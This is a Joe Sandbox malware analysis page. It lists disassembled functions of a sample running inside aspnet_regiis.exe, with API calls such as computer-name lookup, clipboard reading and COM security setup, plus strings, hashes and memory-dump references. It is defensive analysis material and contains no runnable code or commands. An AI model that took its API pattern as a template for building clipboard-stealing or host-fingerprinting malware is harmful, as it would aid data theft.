Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: 88c49bff5c4c4b70e252d705c338ed919aaafd6219e15f293cbb4dbd05fdea32
Instruction ID: 7525f666dd206e0e18b0217833d3d103e96f467e0af1c8ff4ab4264b03083981
Opcode Fuzzy Hash: 88c49bff5c4c4b70e252d705c338ed919aaafd6219e15f293cbb4dbd05fdea32
Instruction Fuzzy Hash: 7621023250D7E18BD7358F658494BFABBF1EF92300F59884DC8CADB241CA748409CB52

Function 008CB948 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 76COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000005,11780A54,00000100), ref: 008CBA54

Strings

bC, xrefs: 008CB992

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: bC
API String ID: 3545744682-4190571504
Opcode ID: a6916ad97bded3dc690a54e0b73c6b3e6c8e2b3725023f240339c34580f5de8b
Instruction ID: 0e992b1d2bc31e95c3320bad35cd60e2d030cd811f3ec6d70fcc1cd805c2156c
Opcode Fuzzy Hash: a6916ad97bded3dc690a54e0b73c6b3e6c8e2b3725023f240339c34580f5de8b
Instruction Fuzzy Hash: 9821D33654D7A1CBD734CF6084947AABBE2FFC5314F15895DC9CA9B340CA749809CB92

Function 008CB7AD Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

GetComputerNameExA.KERNELBASE(00000006,?,00000100), ref: 008CB924

Strings

KHGN, xrefs: 008CB89B

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: ComputerName
String ID: KHGN
API String ID: 3545744682-1032087821
Opcode ID: b440fc7327077b79c6cb0b4aa0ff832e17bedec18421155a8a38b252b906cf6d
Instruction ID: 4e7baef0649fade7d97a37883579400288636d7321151afd8e80194b3e5e90dd
Opcode Fuzzy Hash: b440fc7327077b79c6cb0b4aa0ff832e17bedec18421155a8a38b252b906cf6d
Instruction Fuzzy Hash: A511C6701486858FD7258B35A8A1BFB7FE8EB8B354F14482DD1C9C7281DB35884A9B52

Function 008A9D5E Relevance: 1.6, APIs: 1, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(?,00000000,00000070), ref: 008A9E1A

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 21bb12c05024495e9d7954980c9a2ad69e1e65ce3b2fe56fefd74e259a5a990f
Instruction ID: 991c24069e1247068c7932e53ef0889e25bc501bb2cc6f3708b373cd6df45916
Opcode Fuzzy Hash: 21bb12c05024495e9d7954980c9a2ad69e1e65ce3b2fe56fefd74e259a5a990f
Instruction Fuzzy Hash: 7B1108756443908FC7188F25D8816A97FE1FB96325B1AC09CD491EB762C23CE846CB54

Function 008DD880 Relevance: 1.6, APIs: 1, Instructions: 55COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc8d56082bd1bef738abaa71f7f9f58c84841ee8919388b0a80fc672ee8b508a
Instruction ID: db6fe198cf2825323f49ff627c36249a38ea88bd638b1b52a43081269915152e
Opcode Fuzzy Hash: fc8d56082bd1bef738abaa71f7f9f58c84841ee8919388b0a80fc672ee8b508a
Instruction Fuzzy Hash: A0F0CD71124341EFD7201F38AC89E27377CFF86701F040D3AF541D6261EF61A8089662

Function 008D6805 Relevance: 1.5, APIs: 1, Instructions: 44COMMON

Download Yara Rule

APIs

GetUserDefaultUILanguage.KERNELBASE ref: 008D6831

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: DefaultLanguageUser
String ID:
API String ID: 95929093-0
Opcode ID: 0490aa9c626717aed1367f7ef7dbbff0dacd0e9b7ade04de578dfe5747dd4d2f
Instruction ID: a24a1b8cca440f4b4d752d38d0fb4c57663dc6b1c5c203e465f2c491d9c2e4c4
Opcode Fuzzy Hash: 0490aa9c626717aed1367f7ef7dbbff0dacd0e9b7ade04de578dfe5747dd4d2f
Instruction Fuzzy Hash: B1110834804686CFC719DB3C84522A9BFB2BF56314F04439CC48E87392DB319914DB12

Function 008CDE0C Relevance: 1.5, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 008CDE5A

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 62e3ff22ad5920495449b321379d3ee0ff3778e923a85bf558c3c7d5429e6826
Instruction ID: 230370fc12fc9bfe4e2fabcf4ea21c0a6c2f98a91638e279e8b481b2bdade4e5
Opcode Fuzzy Hash: 62e3ff22ad5920495449b321379d3ee0ff3778e923a85bf558c3c7d5429e6826
Instruction Fuzzy Hash: A7F04971608702CFE300CF24C59930BBBE6BB84314F21880CE0944B350C7B5EA498FC2

Function 008D16B2 Relevance: 1.5, APIs: 1, Instructions: 23COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 008D16F7

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: c35033cda6076425ecd99dccebe9069713dad681f35ae370ed033ea88e4bfd35
Instruction ID: e64dc5f5be6af0aa851bcf6ddd715b5694a55a77a4bae7f4e20ea44a3d4f0fc6
Opcode Fuzzy Hash: c35033cda6076425ecd99dccebe9069713dad681f35ae370ed033ea88e4bfd35
Instruction Fuzzy Hash: BCF074B4609302DFE354DF69D5A871BBBE1FB88304F11881DE5958B390D7B59A48CF82

Function 008AC69E Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 008AC6B0

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 001affdc785ae9f4e7fc74cabc91418995358c05d9f8ebe43ca841e9ce61623b
Instruction ID: 145f126806f418e23a208380bf87bfc6a623b4794e3b821b554fba0f6315d4fd
Opcode Fuzzy Hash: 001affdc785ae9f4e7fc74cabc91418995358c05d9f8ebe43ca841e9ce61623b
Instruction Fuzzy Hash: 97E05E35BD43406BF6394A08DC57F44321263C4F31F388314F310EE3D8C9A8A501420C

Function 008AC660 Relevance: 1.5, APIs: 1, Instructions: 20COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 008AC673

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 36f4978372240e079e15530c060a79bdd5eeed4fb6e47ae67f4cbd670ff62036
Instruction ID: 9da58c88178d637182354639675b7453a29598c882c46decd2105c4eb2741a7e
Opcode Fuzzy Hash: 36f4978372240e079e15530c060a79bdd5eeed4fb6e47ae67f4cbd670ff62036
Instruction Fuzzy Hash: C0E02731B506441FD304571CDC87F45351B93C1335F4C82146560CF3C4D974AD10C155

Function 008DE6A5 Relevance: 1.5, APIs: 1, Instructions: 17COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 008DE6A5

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: ForegroundWindow
String ID:
API String ID: 2020703349-0
Opcode ID: 91471a4d87a0d781c35da4603728edfecb0a1bd8c8a93be026e632c91093be93
Instruction ID: ec20915824687f1e19c5322a08a5b07c6a5e102f696fec4f7fda8f3a1b009450
Opcode Fuzzy Hash: 91471a4d87a0d781c35da4603728edfecb0a1bd8c8a93be026e632c91093be93
Instruction Fuzzy Hash: 85C08CF82080E49BC358D715FCCA96A3B5EFFC52083098138D94B0BB27E9606801C783

Function 008DBCB0 Relevance: 1.5, APIs: 1, Instructions: 13memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,00000000,008DD8F6,?,?,?,00000000,008AB40D,00000000,00000000), ref: 008DBCCE

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: e280a4e85fd5b7d14cdf85162ea361dc2767c64ccb1a20d095960d74ceddab42
Instruction ID: bea16d8e8190a9bd2058e28cf4529b3375d191112a3f69cd0edb114f4f35ce0c
Opcode Fuzzy Hash: e280a4e85fd5b7d14cdf85162ea361dc2767c64ccb1a20d095960d74ceddab42
Instruction Fuzzy Hash: 70D01231405522EBC7105F28FC06F963B54FF59720F074462B444AF171C764EC50DAD5

Function 008DBC90 Relevance: 1.5, APIs: 1, Instructions: 9memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?,AC36FDA1,008A8797,2D2C008A), ref: 008DBCA0

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 846ac37c85ba86b31edbc96e5f0faa81e51aaf8eaff742b611f16d78983b3780
Instruction ID: 0e3588b82e58c8c0c45069089878feba6d7ebfc45a239fbb17d62fa97f60194c
Opcode Fuzzy Hash: 846ac37c85ba86b31edbc96e5f0faa81e51aaf8eaff742b611f16d78983b3780
Instruction Fuzzy Hash: 77C09231046120ABCA206B28FC09FCA7F68FF55360F1681A2B105A71B3C770AC82EBD5

Non-executed Functions

Function 008B11E9 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 499COMMON

Download Yara Rule

Strings

}, xrefs: 008B1535
f, xrefs: 008B175C
u, xrefs: 008B15C5
?, xrefs: 008B13E9
(, xrefs: 008B16CF

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID:
String ID: ($?$f$u$}
API String ID: 0-3561895482
Opcode ID: 8deb2fab5c54fab4ffdb270e8c5b525b854a8c6ffc67e71413270e521bf7ea3b
Instruction ID: 81461ece97d60f8ab6420ee4aa259898d5c11de00e9aea5ea20203a81fd33aed
Opcode Fuzzy Hash: 8deb2fab5c54fab4ffdb270e8c5b525b854a8c6ffc67e71413270e521bf7ea3b
Instruction Fuzzy Hash: 0512A071A0C7808BD764DF3884953AEBBE1FB95324F598A2EE4D9C7392D63489418B43

Function 008C37D0 Relevance: 12.7, APIs: 2, Strings: 5, Instructions: 431COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,00000000), ref: 008C38A8
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001E,00000000,6A195A3A), ref: 008C394C

Strings

n`fn, xrefs: 008C53D5
52, xrefs: 008C3856
]VWC, xrefs: 008C53A4
lnmh, xrefs: 008C53BF
QVTH, xrefs: 008C53AC

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: 52$QVTH$]VWC$lnmh$n`fn
API String ID: 237503144-3964871452
Opcode ID: 577fce801f5068eac9ab952d45586ded8fcaa24daeb304af5ba587df343691ef
Instruction ID: 2b906c8aa876586702dbd04ed31ca9df9c51ffb6c3dc082d3eeb0dde06fe398e
Opcode Fuzzy Hash: 577fce801f5068eac9ab952d45586ded8fcaa24daeb304af5ba587df343691ef
Instruction Fuzzy Hash: 3CE1137160C3818BD724CF68D8917ABBBE1FB85314F044A2DFA968B381D775E905DB82

Function 008D2D70 Relevance: 9.2, APIs: 6, Instructions: 179clipboardCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 008D2D80
GetClipboardData.USER32 ref: 008D2DA1
GlobalLock.KERNEL32 ref: 008D2DBA
CloseClipboard.USER32 ref: 008D2FC8

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: Clipboard$CloseDataGlobalLockOpen
String ID:
API String ID: 1494355150-0
Opcode ID: 511844c92cc24742afb45240a06c3d9ed1e2d36076aad8103cd04022a3e8520b
Instruction ID: e8dd0fe710b5e0618421b2c3527ba957bebb31b8a66cfa33ee42f5a3bf273cef
Opcode Fuzzy Hash: 511844c92cc24742afb45240a06c3d9ed1e2d36076aad8103cd04022a3e8520b
Instruction Fuzzy Hash: B3510372A1C7518FC310AF7C888921EBAE1ABD5224F098B6DE8E4D73D1D674890987D2

Function 008C8F6C Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 219COMMON

Download Yara Rule

APIs

RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 008C8DFB
RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000001F,00000000,00000000,?), ref: 008C8F3C

Strings

zM, xrefs: 008C8E89
rM, xrefs: 008C8E90

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: EnvironmentExpandStrings
String ID: rM$zM
API String ID: 237503144-2784921869
Opcode ID: 27f351bc6deb90a4d3b5ebfb9eeb63c707f3b976fdfab95cca37a98c7eee35c9
Instruction ID: fbcc4d16b76e080b8185eb09d34ecccbfc112155f6a018c38c3a3fc9869d9cb7
Opcode Fuzzy Hash: 27f351bc6deb90a4d3b5ebfb9eeb63c707f3b976fdfab95cca37a98c7eee35c9
Instruction Fuzzy Hash: AA61CFF0A443229FE754CF69C891A9ABFB0FB56350F1942ACE4459F392C3748842CBD5

Function 008D2FE0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 142COMMON

Download Yara Rule

APIs

GetSystemMetrics.USER32 ref: 008D3029
GetSystemMetrics.USER32 ref: 008D3039

Strings

, xrefs: 008D3126

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: MetricsSystem
String ID:
API String ID: 4116985748-3916222277
Opcode ID: cc2b7cf49b2b1a9bb68014eabd22a7e378c8fa801ba483873dc07e7f0f1d63c6
Instruction ID: 9bd66cf24d2a324038b4fa883827832040c1a0c3c192c78a924babc38a88515b
Opcode Fuzzy Hash: cc2b7cf49b2b1a9bb68014eabd22a7e378c8fa801ba483873dc07e7f0f1d63c6
Instruction Fuzzy Hash: B5815CB0519384CFD7A0DF66D98869EBBE0FB86308F50891DE5D88B350DBB49948CF52

Function 008D21FB Relevance: 22.9, APIs: 2, Strings: 11, Instructions: 105COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 008D2204
VariantInit.OLEAUT32 ref: 008D2210

Strings

l, xrefs: 008D2276
~, xrefs: 008D222E
n, xrefs: 008D226E
j, xrefs: 008D225E
f, xrefs: 008D224E
|, xrefs: 008D2236
b, xrefs: 008D223E
h, xrefs: 008D2266
x, xrefs: 008D2226
`, xrefs: 008D2246
d, xrefs: 008D2256

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: `$b$d$f$h$j$l$n$x$|$~
API String ID: 2610073882-2392625418
Opcode ID: 8a14511e7dd0b113b3cf848f91f09ed46ee9b584c0d9d89c44a92ea925dc6c5f
Instruction ID: bb57289384ba1933cfdc1db6292ff4004c5a2e8f29cfd5b94dcd507a6af7d78b
Opcode Fuzzy Hash: 8a14511e7dd0b113b3cf848f91f09ed46ee9b584c0d9d89c44a92ea925dc6c5f
Instruction Fuzzy Hash: 01414B71208B81CFD725CF3CC884646BFA2AB66224F18869CD8E54F3EAD3B5D415C762

Function 008D1FCB Relevance: 22.8, APIs: 2, Strings: 11, Instructions: 100COMMON

Download Yara Rule

APIs

VariantClear.OLEAUT32 ref: 008D1FD8
VariantInit.OLEAUT32 ref: 008D1FE4

Strings

f, xrefs: 008D2028
|, xrefs: 008D2010
h, xrefs: 008D2040
d, xrefs: 008D2030
j, xrefs: 008D2038
`, xrefs: 008D2020
l, xrefs: 008D2050
b, xrefs: 008D2018
n, xrefs: 008D2048
~, xrefs: 008D2008
x, xrefs: 008D2000

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: Variant$ClearInit
String ID: `$b$d$f$h$j$l$n$x$|$~
API String ID: 2610073882-2392625418
Opcode ID: c3c58f8f949b61a753d25dd5c836e9efce67e39a6ef37e1c54018799476b3181
Instruction ID: 21453d79e6c13f313d9054b6be13ee7522a82d7b472f14198040231700667a8d
Opcode Fuzzy Hash: c3c58f8f949b61a753d25dd5c836e9efce67e39a6ef37e1c54018799476b3181
Instruction Fuzzy Hash: 87410860208B818FD725CF3CC898716BFE2AB56224F08869CE8E58F3D6C679D515C762

Function 008CD00D Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 289COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?), ref: 008CD2C2

Strings

0, xrefs: 008CD25F
!, xrefs: 008CD2E4

Memory Dump Source

Source File: 00000002.00000002.1858322674.00000000008A1000.00000020.00000400.00020000.00000000.sdmp, Offset: 008A0000, based on PE: true

Associated: 00000002.00000002.1858305731.00000000008A0000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858359123.00000000008E2000.00000002.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858377406.00000000008E5000.00000040.00000400.00020000.00000000.sdmpDownload File
Associated: 00000002.00000002.1858396429.00000000008F3000.00000002.00000400.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8a0000_aspnet_regiis.jbxd

Similarity

API ID: FreeLibrary
String ID: !$0
API String ID: 3664257935-301933775
Opcode ID: cbe67722457708e4f1046fef76ba680a56efa97a6f3aff33a9cc327da43d1909
Instruction ID: 784ef9423cf328d508c380bc3116fa9ae29ab6646c72d858ec87cc29e1edf46f
Opcode Fuzzy Hash: cbe67722457708e4f1046fef76ba680a56efa97a6f3aff33a9cc327da43d1909
Instruction Fuzzy Hash: E18158315083808BC7289B288841B6AFFE2FFD6304F28867ED8D6DB391D638C9458756

